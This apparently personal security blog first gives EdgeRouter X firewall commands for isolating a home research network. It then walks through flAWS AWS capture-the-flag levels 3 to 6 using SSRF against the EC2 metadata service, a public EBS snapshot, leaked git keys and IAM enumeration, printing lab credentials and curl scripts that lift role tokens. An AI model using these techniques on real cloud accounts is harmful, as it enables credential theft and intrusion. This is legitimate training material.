Segregated research network with EdgeRouter X

I required a segregated region of my home network that could leverage the same internet connection and NAT border, but be isolated from everything else on my network. This was primarily to be used as a quarantine area for conducting research, and somewhere to place untrusted foreign devices.

I decided to use the eth3 interface on my EdgeRouter X for this purpose, plugging a standard ol’ router/AP combo into it via the combo’s WAN interface, which obtains an IP address via DHCP.

Here are the steps and configuration I used:

Via the ER web GUI:

  • Remove eth3 from the switch0 group
  • Configure an IP address and subnet for eth3, for example 10.0.0.1/30
  • Set up DHCP for 10.0.0.0/30, with the router specified as 10.0.0.1
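
If you’d rather do those three GUI steps from the CLI as well, the configure-mode equivalent looks roughly like this (a sketch based on EdgeOS syntax – RESEARCH is just an arbitrary shared-network name, and the DHCP stanza is worth verifying against your firmware version):

        configure
        delete interfaces switch switch0 switch-port interface eth3
        set interfaces ethernet eth3 address 10.0.0.1/30
        set service dhcp-server shared-network-name RESEARCH subnet 10.0.0.0/30 default-router 10.0.0.1
        set service dhcp-server shared-network-name RESEARCH subnet 10.0.0.0/30 start 10.0.0.2 stop 10.0.0.2
        commit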

Via the ER cli:

  • Enter configure mode, and create a network-group that specifies my ‘Production’ LAN subnet(s) that I don’t want the research network to be able to communicate with:
      configure
      set firewall group network-group LAN_NETWORKS
      set firewall group network-group LAN_NETWORKS description "LAN Networks"
      set firewall group network-group LAN_NETWORKS network 192.168.0.0/24
    
  • Create a firewall ruleset to allow the research network to connect to everything (i.e. the internet) except for the ‘Production’ LAN subnet(s) specified above:
      set firewall name PROTECT_IN
      set firewall name PROTECT_IN default-action accept
      set firewall name PROTECT_IN rule 20 action drop
      set firewall name PROTECT_IN rule 20 description "Drop LAN_NETWORKS"
      set firewall name PROTECT_IN rule 20 destination group network-group LAN_NETWORKS
      set firewall name PROTECT_IN rule 20 protocol all
    
  • Create a firewall ruleset to allow the research network to use the DHCP and DNS services provided by the EdgeRouter X:
      set firewall name PROTECT_LOCAL
      set firewall name PROTECT_LOCAL default-action drop
      set firewall name PROTECT_LOCAL rule 10 action accept
      set firewall name PROTECT_LOCAL rule 10 description "Accept DNS"
      set firewall name PROTECT_LOCAL rule 10 destination port 53
      set firewall name PROTECT_LOCAL rule 10 protocol tcp_udp
      set firewall name PROTECT_LOCAL rule 20 action accept
      set firewall name PROTECT_LOCAL rule 20 description "Accept DHCP"
      set firewall name PROTECT_LOCAL rule 20 destination port 67
      set firewall name PROTECT_LOCAL rule 20 protocol udp
    
  • Commit the changes made thus far
      commit
    
  • Now we need to associate the firewall rulesets with the interface being used for the research network, in my case eth3:
      set interfaces ethernet eth3 firewall in name PROTECT_IN
      set interfaces ethernet eth3 firewall local name PROTECT_LOCAL
    
  • Finally, commit and save the configuration
      commit
      save
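
Once everything is committed, you can sanity-check that traffic is actually hitting the rules. From operational mode (type exit to leave configure mode), rule hit counters should be visible – the command below is standard EdgeOS/Vyatta, but verify against your firmware version:

        exit
        show firewall name PROTECT_IN statistics
        show firewall name PROTECT_LOCAL statistics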
    
flAWS – AWS CTF – Level 6

Level 6 – Challenge statement:

For this final challenge, you’re getting a user access key that has the SecurityAudit policy attached to it. See what else it can do and what else you might find in this AWS account.

Access key ID: AKIAJFQ6E7BY57Q3OBGA

Secret: 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

link

Background

flaws.cloud itself says it best:

Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). 
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.

A series of hints are provided that will teach you how to discover the info you'll need. 
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. 
At the start of each level you'll learn how to avoid the problem the previous level exhibited.

Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud. 

My approach:

This time we start with purportedly valid creds, so it seems we need to look for some misconfigurations to exploit.

First, let’s load the creds for use in the AWS CLI:

        $ aws configure --profile flawslevel6          
        AWS Access Key ID [None]: AKIAJFQ6E7BY57Q3OBGA
        AWS Secret Access Key [None]: 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
        Default region name [None]: us-west-2
        Default output format [None]:

The AWS documentation states the following as it relates to the SecurityAudit managed policy:

        Security Auditor
        AWS managed policy name: SecurityAudit

        Use case: This user monitors accounts for compliance with security requirements. This user can access logs and events to investigate potential security breaches or potential malicious activity.

        Policy description: This policy grants permissions to view configuration data for many AWS services and to review their logs.

Interesting – I noticed an S3 bucket called flaws-logs earlier, let’s see:

        aws s3 ls s3://flaws-logs --profile flawslevel6
        An error occurred (AccessDenied) when calling the ListObjects operation: Access Denied

Ok, not that easy.

Other AWS services this policy is likely to cover include CloudTrail and CloudWatch…

        aws cloudtrail describe-trails --profile flawslevel6
        "trailList": [      
          {
          "IncludeGlobalServiceEvents": true,
          "Name": "cloudtrail",
          "S3KeyPrefix": "cloudtrail",
          "TrailARN": "arn:aws:cloudtrail:us-west-2:975426262029:trail/cloudtrail",
          "LogFileValidationEnabled": true,
          "IsMultiRegionTrail": true,
          "HasCustomEventSelectors": false,
          "S3BucketName": "flaws-logs",
          "HomeRegion": "us-west-2"
          }
        ] 

Indeed CloudTrail is ON, with a trail named cloudtrail, pushing files with the cloudtrail prefix to the flaws-logs bucket.

Let’s see if we can list the CloudTrail events:

        ~$ aws cloudtrail lookup-events --profile flawslevel6                                                                                                                                           
        An error occurred (AccessDeniedException) when calling the LookupEvents operation: User: arn:aws:iam::975426262029:user/Level6 is not authorized to perform: cloudtrail:LookupEvents

Nope.

Let’s learn more about this user:

  $ aws --profile flawslevel6 iam get-user
  {                                                                                                                         
        "User": {                                                                                                            
        "UserName": "Level6",                                                                                             
        "Path": "/",                                                                                                       
        "CreateDate": "2017-02-26T23:11:16Z",                                                                               
        "UserId": "AIDAIRMDOSCWGLCDWOG6A",
        "Arn": "arn:aws:iam::975426262029:user/Level6"
        }
  }                  

And their attached policies:

        $ aws --profile flawslevel6 iam list-attached-user-policies --user-name Level6
        {
            "AttachedPolicies": [
                {
                    "PolicyName": "list_apigateways",
                    "PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
                },
                {
                    "PolicyName": "SecurityAudit",
                    "PolicyArn": "arn:aws:iam::aws:policy/SecurityAudit"
                }
            ]
        }

Oh! This user also has the list_apigateways policy attached.

Let’s learn more about this policy:

        aws --profile flawslevel6 iam get-policy  --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
        {
            "Policy": {
                "PolicyName": "list_apigateways",
                "Description": "List apigateways",
                "CreateDate": "2017-02-20T01:45:17Z",
                "AttachmentCount": 1,
                "IsAttachable": true,
                "PolicyId": "ANPAIRLWTQMGKCSPGTAIO",
                "DefaultVersionId": "v4",
                "Path": "/",
                "Arn": "arn:aws:iam::975426262029:policy/list_apigateways",
                "UpdateDate": "2017-02-20T01:48:17Z"
            }
        }

Now that we have the ARN and the version id – we can get the meat of this policy:

        $ aws --profile flawslevel6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
        {
            "PolicyVersion": {
                "CreateDate": "2017-02-20T01:48:17Z",
                "VersionId": "v4",
                "Document": {
                    "Version": "2012-10-17",
                    "Statement": [
                        {
                            "Action": [
                                "apigateway:GET"
                            ],
                            "Resource": "arn:aws:apigateway:us-west-2::/restapis/*",
                            "Effect": "Allow"
                        }
                    ]
                },
                "IsDefaultVersion": true
            }
        }

Now we know that this user is allowed to use the action GET with the resource arn:aws:apigateway:us-west-2::/restapis/*

API Gateway is typically used in conjunction with Lambda functions, so let’s see if we can list any:

        $ aws --region us-west-2 --profile flawslevel6 lambda list-functions
        {
            "Functions": [
                {
                    "TracingConfig": {
                        "Mode": "PassThrough"
                    },
                    "Version": "$LATEST",
                    "CodeSha256": "2iEjBytFbH91PXEMO5R/B9DqOgZ7OG/lqoBNZh5JyFw=",
                    "FunctionName": "Level6",
                    "MemorySize": 128,
                    "CodeSize": 282,
                    "FunctionArn": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
                    "Handler": "lambda_function.lambda_handler",
                    "Role": "arn:aws:iam::975426262029:role/service-role/Level6",
                    "Timeout": 3,
                    "LastModified": "2017-02-27T00:24:36.054+0000",
                    "Runtime": "python2.7",
                    "Description": "A starter AWS Lambda function."
                }
            ]
        }

There is one, called Level6 – let’s look at its resource policy:

        aws --region us-west-2 --profile flawslevel6 lambda get-policy --function-name Level6
        {
            "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"904610a93f593b76ad66ed6ed82c0a8b\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-west-2:975426262029:function:Level6\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\"}}}]}"
        }
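
The Policy value comes back as an escaped JSON string, which is painful to read. Assuming you have jq installed, pretty-printing it is a one-liner:

        aws --region us-west-2 --profile flawslevel6 lambda get-policy --function-name Level6 | jq -r '.Policy' | jq .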

Interesting info: API Gateway is allowed to invoke this function via arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6, where s33ppypa75 is a rest-api-id.

To get the full path we’ll need the stage name:

        aws --profile flawslevel6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
        {
            "item": [
                {
                    "stageName": "Prod",
                    "cacheClusterEnabled": false,
                    "cacheClusterStatus": "NOT_AVAILABLE",
                    "deploymentId": "8gppiv",
                    "lastUpdatedDate": 1488155168,
                    "createdDate": 1488155168,
                    "methodSettings": {}
                }
            ]
        }

The stage name is Prod.

So we have all the pieces to complete the format: https://<rest-api-id>.execute-api.<region>.amazonaws.com/<stage-name>/<lambda function>

Therefore, we can access the endpoint here: https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
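
Or, equivalently, fetch it from the command line:

        curl https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6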

Browsing there (or curling the endpoint) yields the following output:

        "Go to http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/"  

Done!

Level 6 complete.

flAWS – AWS CTF – Level 5

Level 5 – Challenge statement:

This EC2 has a simple HTTP only proxy on it. Here are some examples of its usage:

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/flaws.cloud/

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/summitroute.com/blog/feed.xml

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/neverssl.com/

See if you can use this proxy to figure out how to list the contents of the level6 bucket at level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud that has a hidden directory in it.

link

Background

flaws.cloud itself says it best:

Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). 
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.

A series of hints are provided that will teach you how to discover the info you'll need. 
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. 
At the start of each level you'll learn how to avoid the problem the previous level exhibited.

Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud. 

My approach:

We need to find the hidden directory within the level 6 bucket – level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud

What happens if we try browsing directly to the bucket?

        Access Denied
        Level 6 is hosted in a sub-directory, but to figure out that directory, you need to play level 5 properly.

Ok, so the level 5 EC2 instance gives us a proxy, where the target URL should be appended to the end of http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/

What if we tried to browse to the Level6 bucket via the proxy?

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud

No dice.

I spent quite a bit of time thinking this one through, and tried a few fruitless things. So I decided to get a hint via http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/hint1.html, which said:

        On cloud services, including AWS, the IP 169.254.169.254 is magical. It's the metadata service.
        There is an RFC on it (RFC-3927), but you should read the AWS specific docs on it here.

Ah, of course! What if we use the proxy to fetch its own instance meta-data… perhaps we could get some credentials or other useful info to use…

Let’s try to find something within the latest meta-data:

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/

        ami-id
        ami-launch-index
        ami-manifest-path
        block-device-mapping/
        hostname
        iam/
        instance-action
        instance-id
        instance-type
        local-hostname
        local-ipv4
        mac
        metrics/
        network/
        placement/
        profile
        public-hostname
        public-ipv4
        public-keys/
        reservation-id
        security-groups
        services/

iam/ looks interesting – let’s go in there:

        info
        security-credentials/

security-credentials/ – yes please, let’s follow that:

        flaws

flaws – nice, that is the name of the IAM role attached to the instance

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws

        {
          "Code" : "Success",
          "LastUpdated" : "2018-02-07T06:23:47Z",
          "Type" : "AWS-HMAC",
          "AccessKeyId" : "ASIAJXNSZYFI7LKRQ4KA",
          "SecretAccessKey" : "gX0Tlc11lbWsdhPMKSGtWCAR2EuTqauh6DFAt4f8",
          "Token" : "FQoDYXdzELj//////////wEaDKOpciHx0oqRxX5GbiK3A/MQWiOVjusWUJ0Uq2gVwHpsro6Yz9kztwcyyKmzMSUxc85LAtdyr2Q6zQ5AIe1GATRGWAqpG+z1ZZdKIrernZaqc6Cv8zNkQsPC0yLVmTjGJcBG443u6phnrnmkea+nXzA2X9rHC191XIlWH3JfOqR4L92+/Q9uOmt3K1XHoXkzHWr+OdbbvYedYAjqngLz6ifOGGZ1LC5s6a35/hw4ty3xaAXGC1x1z+uDuq5AM3FcrNv21FdBKOzz4VqKg3FXeJi4VLyetuOYJojj/i0goLZ1Lw7FGoX3lW1xwBV18yVQTscaEWI/s5EQS1nNOo+XNkbuT+CuxQUvAbU5CJyLCt7DPWz3SPBn/YY1mGgDRJdRWErOQzxw1PYQgrNVxca7ZhzLlKjR7J26IpD0E88W4Y4hRjut3wtlL5QXqNCUe4Wob9szWi/ClNxLxscsDNxlIhvbStwgEVrqg3UDLQrS+KDhL2uk1Rd49SQ5vYLQ2TjalvDxl+RWmC3la5GzqrfHFQIhhagb4ciJpdKc2R+J7Gn8gGdUZt8cEym0iUR0Dg79PO+s529nIvo+d0Z6lyXh4DLRTIYUN+wo1bbq0wU=",
          "Expiration" : "2018-02-07T12:33:10Z"
        }

Great! creds!

But given this is an IAM role, we can’t just use the AccessKeyId and SecretAccessKey: these were issued by STS (Security Token Service), so we need to use the Token too. Furthermore, these values rotate automatically, so we’ll need to grab them programmatically and use them right away.

So I’ll script it as follows to pull them into environment variables:

        export AWS_ACCESS_KEY_ID=`curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws | grep "AccessKeyId" | awk '{print $3}' | cut -d\" -f2`

        export AWS_SECRET_ACCESS_KEY=`curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws | grep "SecretAccessKey" | awk '{print $3}' | cut -d\" -f2`

        export AWS_SESSION_TOKEN=`curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws | grep "Token" | awk '{print $3}' | cut -d\" -f2`
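
(Aside: the grep/awk/cut pipeline works, but it fetches the credentials three times. If jq happens to be installed on your machine, a single fetch is tidier:)

        # fetch the temporary role credentials once, then export the three values
        CREDS=$(curl -s http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws)
        export AWS_ACCESS_KEY_ID=$(echo "$CREDS" | jq -r '.AccessKeyId')
        export AWS_SECRET_ACCESS_KEY=$(echo "$CREDS" | jq -r '.SecretAccessKey')
        export AWS_SESSION_TOKEN=$(echo "$CREDS" | jq -r '.Token')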

Then let’s see if we can list the contents of the level 6 bucket:

        aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud                                                 
                                   PRE ddcc78ff/                                                                           
        2017-02-27 10:11:07        871 index.html

Oh, looky – ddcc78ff/ must be our sub-directory. Let’s browse there: http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/

Winner!

Level 6 unlocked.

flAWS – AWS CTF – Level 4

Level 4 – Challenge statement:

For the next level, you need to get access to the web page running on an EC2 at 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud

It’ll be useful to know that a snapshot was made of that EC2 shortly after nginx was setup on it.

link

Background

flaws.cloud itself says it best:

Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). 
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.

A series of hints are provided that will teach you how to discover the info you'll need. 
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. 
At the start of each level you'll learn how to avoid the problem the previous level exhibited.

Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud. 

My approach:

The challenge states that there is an EBS snapshot of the EC2 instance – so I’d imagine we could find some creds in there.

Let’s try to get the VolumeId of the running instances:

        aws ec2 describe-instances --profile flaws
        <snip>
        "Ebs": {
             "Status": "attached",
             "DeleteOnTermination": true,
             "VolumeId": "vol-04f1c039bc13ea950",
             "AttachTime": "2017-02-12T22:29:25.000Z"
        }
        <snip>

Convenient – only a single running EC2 instance, with a VolumeId of vol-04f1c039bc13ea950. But let’s be sure it’s actually the instance we want by comparing the public IPv4 address:

        aws ec2 describe-instances --profile flaws
        "Association": {
             "PublicIp": "35.165.182.7",
             "PublicDnsName": "ec2-35-165-182-7.us-west-2.compute.amazonaws.com",
             "IpOwnerId": "amazon"
        }
        <snip>
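
(Rather than eyeballing the full describe-instances JSON twice, a JMESPath --query can pull out just the fields we care about in one call – a sketch:)

        aws ec2 describe-instances --profile flaws \
            --query 'Reservations[].Instances[].{Id:InstanceId,IP:PublicIpAddress,Vols:BlockDeviceMappings[].Ebs.VolumeId}'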

The running instance has a public IP of 35.165.182.7; let’s do a look-up on 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud to see if it matches:

        ~$ nslookup 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud
        Server:         8.8.8.8
        Address:        8.8.8.8#53

        Non-authoritative answer:
        4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud    canonical name = ec2-35-165-182-7.us-west-2.compute.amazonaws.com.
        Name:   ec2-35-165-182-7.us-west-2.compute.amazonaws.com
        Address: 35.165.182.7

It’s a match!

Now let’s find that EBS snapshot by VolumeId:

        ~$ aws ec2 describe-snapshots --filters "Name=volume-id, Values=vol-04f1c039bc13ea950" --profile flaws
        {
            "Snapshots": [
                {
                    "Description": "",
                    "Tags": [
                        {
                            "Value": "flaws backup 2017.02.27",
                            "Key": "Name"
                        }
                    ],
                    "Encrypted": false,
                    "VolumeId": "vol-04f1c039bc13ea950",
                    "State": "completed",
                    "VolumeSize": 8,
                    "StartTime": "2017-02-28T01:35:12.000Z",
                    "Progress": "100%",
                    "OwnerId": "975426262029",
                    "SnapshotId": "snap-0b49342abd1bdcb89"
                }
            ]
        }

Now let’s check the createVolumePermission on this snapshot:

        ~$ aws ec2 describe-snapshot-attribute --snapshot-id snap-0b49342abd1bdcb89 --attribute createVolumePermission --profile flaws
        {
            "SnapshotId": "snap-0b49342abd1bdcb89",
            "CreateVolumePermissions": [
                {
                    "Group": "all"
                }
            ]
        }

Oops! Anyone can create a volume based on this snapshot.

Let’s create a volume from this snapshot in our own AWS account, so we can spin up an EC2 instance with our own SSH keypair, mount it, and poke around.

        aws ec2 create-volume --region us-west-2 --availability-zone us-west-2a --snapshot-id snap-0b49342abd1bdcb89
        
        {
              <snip>
              "State": "creating"
              <snip>
        }

Looks good!

        aws ec2 describe-volumes
        
        {
              <snip>
              "VolumeId": "vol-0a8f64220765bd28a"
              "State": "available"
              <snip>
        }            

Very nice!

Now we need to make an EC2 instance and mount this extra volume to poke around… I’m going to do this via the AWS Console, as that way I don’t need to go and find AMI IDs, Security Group names, Subnet IDs, etc.

<I’m off at the AWS Console, spinning up a T2.micro in us-west-2a – with a security group allowing SSH in>…

I’m back.

First, let’s get the EC2 instance ID:

        aws ec2 describe-instances
        {
              <snip>
              "InstanceId": "i-060483a9958562fad"
              <snip>
        }

Now let’s attach the volume we created as /dev/sdf:

        aws ec2 attach-volume --volume-id vol-0a8f64220765bd28a --instance-id i-060483a9958562fad --device /dev/sdf
        {
              <snip>
              "State": "attaching"
              <snip>
        }

Great – now we should be good to SSH into the instance using our own keypair. Let’s get the public IP:

        aws ec2 describe-instances --instance-ids i-060483a9958562fad
        {
              <snip>
              "PublicIp": "34.217.133.22",
              <snip>
        }

Ok SSH time:

        ssh -i mysupasecretprivatekey ec2-user@34.217.133.22

Let’s see if we can see the block device:

        [ec2-user@ip-172-31-31-47 ~]$ lsblk
        NAME    MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
        xvda    202:0    0   8G  0 disk
        └─xvda1 202:1    0   8G  0 part /
        xvdf    202:80   0   8G  0 disk
        └─xvdf1 202:81   0   8G  0 part

There is the virtual disk – /dev/xvdf1. Let’s make a mount point and mount it:

        sudo mkdir /mnt/flaws
        sudo mount /dev/xvdf1 /mnt/flaws
        $ mount
        <snip>
        /dev/xvdf1 on /mnt/flaws type ext4 (rw,relatime,data=ordered)
        <snip>

Let’s see what we can find:

        $ ls /mnt/flaws/
        bin   dev  home        initrd.img.old  lib64       media  opt   root  sbin  srv  tmp  var      vmlinuz.old
        boot  etc  initrd.img  lib             lost+found  mnt    proc  run   snap  sys  usr  vmlinuz

Looks like a valid Linux filesystem layout. Now… where to get those credentials? The challenge said: “a snapshot was made of that EC2 shortly after nginx was setup on it.”

        $ cat /mnt/flaws/etc/nginx/.htpasswd
        flaws:$apr1$4ed/7TEL$cJnixIRA6P4H8JDvKVMku0

Juicy!

Username: flaws

However, is that password value hashed or plain-text? A quick attempt at http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/ confirmed it’s not the clear-text password.

But it must have been entered in plain-text originally. Let’s see what user directories we have…

        # ls /mnt/flaws/home
        ubuntu

Just the one user – ubuntu

Oops! They left the script in their home directory containing the command used to generate the htpasswd entry from the clear-text password!

        $ cat setupNginx.sh | more
        htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

Let’s try that. User: flaws Password: nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

WORKS!

BTW – /home/ubuntu/.bash_history makes for good reading too.

It tells us to go to: http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/

Level 5 unlocked.

flAWS – AWS CTF – Level 3

Level 3 – Challenge statement:

The next level is fairly similar, with a slight twist. Time to find your first AWS key! I bet you’ll find something that will let you list what other buckets are.

link

Background

flaws.cloud itself says it best:

Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). 
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.

A series of hints are provided that will teach you how to discover the info you'll need. 
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. 
At the start of each level you'll learn how to avoid the problem the previous level exhibited.

Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud. 

My approach:

“Similar” suggests S3 again, perhaps a bucket with AWS access and secret keys in it.

We know that the bucket name to start from is level3-9afd3927f195e10225021a578e6f78df.flaws.cloud

Let’s first try public access, by browsing to: http://s3-us-west-2.amazonaws.com/level3-9afd3927f195e10225021a578e6f78df.flaws.cloud

Works! There seem to be a bunch of files in there.

Let’s get a cleaner list by using the AWS CLI:

  ~$ aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --recursive
  2017-09-17 23:12:24         52 .git/COMMIT_EDITMSG
  2017-09-17 23:12:24         23 .git/HEAD
  2017-09-17 23:12:24        130 .git/config
  2017-09-17 23:12:24         73 .git/description
  2017-09-17 23:12:24        452 .git/hooks/applypatch-msg.sample
  2017-09-17 23:12:24        896 .git/hooks/commit-msg.sample
  2017-09-17 23:12:24        189 .git/hooks/post-update.sample
  2017-09-17 23:12:24        398 .git/hooks/pre-applypatch.sample
  2017-09-17 23:12:24       1704 .git/hooks/pre-commit.sample
  2017-09-17 23:12:24       4898 .git/hooks/pre-rebase.sample
  2017-09-17 23:12:24       1239 .git/hooks/prepare-commit-msg.sample
  2017-09-17 23:12:24       3611 .git/hooks/update.sample
  2017-09-17 23:12:24        600 .git/index
  2017-09-17 23:12:24        240 .git/info/exclude
  2017-09-17 23:12:24        359 .git/logs/HEAD
  2017-09-17 23:12:24        359 .git/logs/refs/heads/master
  2017-09-17 23:12:24        679 .git/objects/0e/aa50ae75709eb4d25f07195dc74c7f3dca3e25
  2017-09-17 23:12:24        770 .git/objects/2f/c08f72c2135bb3af7af5803abb77b3e240b6df
  2017-09-17 23:12:25        820 .git/objects/53/23d77d2d914c89b220be9291439e3da9dada3c
  2017-09-17 23:12:25        245 .git/objects/61/a5ff2913c522d4cf4397f2500201ce5a8e097b
  2017-09-17 23:12:25     112013 .git/objects/76/e4934c9de40e36f09b4e5538236551529f723c
  2017-09-17 23:12:25        560 .git/objects/92/d5a82ef553aae51d7a2f86ea0a5b1617fafa0c
  2017-09-17 23:12:25        191 .git/objects/b6/4c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
  2017-09-17 23:12:25         42 .git/objects/c2/aab7e03933a858d1765090928dca4013fe2526
  2017-09-17 23:12:25        904 .git/objects/db/932236a95ebf8c8a7226432cf1880e4b4017f2
  2017-09-17 23:12:25         98 .git/objects/e3/ae6dd991f0352cc307f82389d354c65f1874a2
  2017-09-17 23:12:25        279 .git/objects/f2/a144957997f15729d4491f251c3615d508b16a
  2017-09-17 23:12:25        125 .git/objects/f5/2ec03b227ea6094b04e43f475fb0126edb5a61
  2017-09-17 23:12:25         41 .git/refs/heads/master
  2017-02-27 08:14:33     123637 authenticated_users.png
  2017-02-27 08:14:34       1552 hint1.html
  2017-02-27 08:14:34       1426 hint2.html
  2017-02-27 08:14:35       1247 hint3.html
  2017-02-27 08:14:33       1035 hint4.html
  2017-02-27 10:05:16       1703 index.html
  2017-02-27 08:14:33         26 robots.txt

Two interesting bits here, namely authenticated_users.png and the .git directory contents.

Let’s browse to the PNG first: http://s3-us-west-2.amazonaws.com/level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/authenticated_users.png

Ok, that’s nothing useful – just an image for the level 3 documentation…

Now let’s poke around the .git directory…

Let’s make a local copy first:

$ aws s3 cp s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud ~/testtest --recursive

.git/COMMIT_EDITMSG contains the message: “Oops, accidentally added something I shouldn’t have” – which likely means that they did a commit inclusive of AWS keys…

Furthermore, if I run git log from inside the copy, I get:

  commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
  Author: 0xdabbad00 <scott@summitroute.com>
  Date:   Sun Sep 17 09:10:43 2017 -0600

      Oops, accidentally added something I shouldn't have

  commit f52ec03b227ea6094b04e43f475fb0126edb5a61
  Author: 0xdabbad00 <scott@summitroute.com>
  Date:   Sun Sep 17 09:10:07 2017 -0600

      first commit

This implies there is something in commit f52ec03b227ea6094b04e43f475fb0126edb5a61 that the developer didn’t want there, and removed it in commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526

Let’s have a closer look at commit f52ec03b227ea6094b04e43f475fb0126edb5a61:

git checkout f52ec03b227ea6094b04e43f475fb0126edb5a61
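
(An alternative that doesn’t move the working tree: running git show on the later commit displays exactly what that commit removed:)

git show b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526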

Then let’s look at what file(s) have popped out:

        ~/testtest$ ls
        access_keys.txt  authenticated_users.png  hint1.html  hint2.html  hint3.html  hint4.html  index.html  robots.txt

Oops – there is access_keys.txt. Let’s look:

        ~/testtest$ cat access_keys.txt
        access_key AKIAJ366LIPB4IJKT7SA
        secret_access_key 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

Let’s make another AWS CLI profile using the newly discovered keys:

        ~/testtest$ aws configure --profile flawslevel3
        AWS Access Key ID [None]: AKIAJ366LIPB4IJKT7SA
        AWS Secret Access Key [None]: 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
        Default region name [None]: us-west-2
        Default output format [None]:

Now let’s see if they are valid, and if any interesting S3 buckets are available:

        $ aws s3 ls --profile flawslevel3
        2017-02-19 03:41:52 2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud
        2017-05-30 00:34:53 config-bucket-975426262029
        2017-02-27 04:06:33 flaws-logs
        2017-02-19 03:40:54 flaws.cloud
        2017-02-24 13:15:42 level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
        2017-02-27 02:29:03 level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
        2017-02-27 02:49:31 level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
        2017-02-27 03:49:03 level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud
        2017-02-27 03:48:40 level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
        2017-02-27 04:07:13 theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud

Indeed! There are the bucket names from level 2 through to the end.

Let’s try browsing to Level 4 publicly: http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/

Level 4 unlocked.

flAWS – AWS CTF – Level 2

Level 2 – Challenge statement:

The next level is fairly similar, with a slight twist. You’re going to need your own AWS account for this. You just need the free tier.

link

